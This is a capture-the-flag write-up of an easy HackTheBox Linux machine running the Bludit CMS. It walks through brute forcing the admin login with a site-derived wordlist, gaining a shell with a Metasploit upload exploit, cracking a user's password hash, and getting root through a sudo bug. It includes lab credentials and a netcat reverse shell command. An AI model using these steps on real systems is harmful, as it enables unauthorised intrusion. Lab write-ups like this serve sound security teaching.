This box was an easy level linux box on HTB created by egotisticalSW, it started with discovering a todo.txt file on the webserver which had a username fergus, we use that username to bruteforce using the passlist created from the website using cewl into the admin pannel of bludit. We use these auth creds in Metasploit exploit exploit/linux/http/bludit_upload_images_exec to get a shell on the server. On enumerating the box we find a newer version of bludit on the box which has the hashed password of user hugo, after cracking it we can get the access as user Hugo. Root is based on a sudo vulnerability was the easiest part of the box.
As always let’s start off with nmap script nmap -sC for default scripts Alright, if it isn’t obvious yet I am a IPPSEC fanboi. Aight, firing up nmap to scan all open ports on the box.
And here is our nmap result
Intresting, only one port open. Alright let’s run an all port scan nmap -p- -T4 10.10.10.191 and start enumerating the websever.
Enumerating the web server
About section has a note I created this site to dump my fact files, nothing more.......?, did some basic enum like checking for robots.txt, reading source code but got nothing. So let’s start a gobuster scan for directory fuzzing.
todo.txt and admin page looks interesting, checking out the todo.txt file first.
fergus looks like a username.
Let’s check the /admin pannel.
Bludit is a CMS and searching Bludit in metasploit gives us a RCE exploit but it needs the authentication creds of admin pannel.
Time to analyse what information we have gathered so far. First a username fergus, Second a metasploit exploit module for bludit that can give us RCE but needs authentication creds. Also the note in website’s about section I created this site to dump my fact files, nothing more.......?, so it can be assumed we need to brute force creds of user fergus and the password might be any word in the website as it is to dump fact files of the user. NGL.. I had a hard time figuring out that we need the wordlist created from the website to bruteforce.
Creating the wordlist.
Bruteforcing the /admin page using the creds will give us the creds fergus:RolandDeschain.
Now let’s use metasploit to get a shell on the box. You can also do it manually exploit but I was a beginner when I did this box first time so I used metasploit for it.
Finding the exploit
Now you can use show exploit to list all options in the exploit, we need to set bludit’s user and password, it can be simply done by set BLUDITUSER fergus and set BLUDITPASS RolandDeschain. Similarly set the value of RHOST, LHOST and LPORT. My configuration looked like this after setting the values.
After setting things up, simply type exploit or run.
Alright we got a shell on the server as user www-data.
During basic enumeration I found a file user.php in /var/www/bludit-3.9.2/bl-content/databases which had password of users but it was a rabbit hole as those passwords were encrypted with a salt. but on enumerating more in /var/www we can found an newer version of bludit bludit-3.10.0a and the password’s in newer version’s user.php aren’t salted.
Throwing the hash faca404fd5c0a31cf1897b823c695c85cffeb98d in crackstation gives us user Hugo’s password - Password120. To get a shell from meterpreter use shell command and then use su Hugo and give the password Password120 and we got our user.
You can directly jump to root part..
I am covering an issue I faced during this box… IDK why but my meterpreter was messing up when I used shell command, maybe I used a wrong payload. So I executed a nc reverse shell command and got another shell nc. yes I could have changed the meterpreter payload and reused bludit exploit.
I tried nc 10.10.14.10 9001 -e /bin/bash it didn’t work, So i used this nc revershell command to get a revshell.
Rooting the box
As we have user’s Hugo password, check if we have any sudo perms.
It reminded me of a sudo vulnerability, as I did something similar in a THM room (It could have been easily discovered using any enum script like linpeas too..), so checking the sudo version.
Simply Googling sudo 1.8.25p1 exploit, led us to this exploit. If you read the exploit the perms match our current sudo -l perms.
If you read the todo.txt file properly.
There are 3 hints in it.
username - fergus
new blog needs images - The bludit exploit was actually due to some vuln related to images(hint for guys who manually exploited it instead of metasploit exploit)
Update the CMS - The box had two bludit version and we got the password for user in updated version.
Always read TODO notes properly.
Hope you learned something new, if you face any issues / have any query, feel free to contact me on social media.